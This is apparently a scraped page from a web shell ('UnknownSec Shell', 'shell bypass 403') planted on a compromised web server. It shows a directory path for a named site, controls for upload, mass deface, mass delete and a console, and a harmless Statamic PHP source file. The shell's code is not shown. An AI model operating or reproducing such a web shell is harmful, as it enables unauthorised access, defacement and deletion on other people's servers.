shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Fieldtypes
/
Bard
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
SetNode.php
<?php namespace Statamic\Fieldtypes\Bard; use Tiptap\Core\Node; class SetNode extends Node { public static $name = 'set'; public function parseHTML() { return [ [ 'tag' => 'set', ], ]; } public function renderHTML($node, $HTMLAttributes = []) { return ['content' => "<set>{$node->index}</set>"]; } }
© 2026 UnknownSec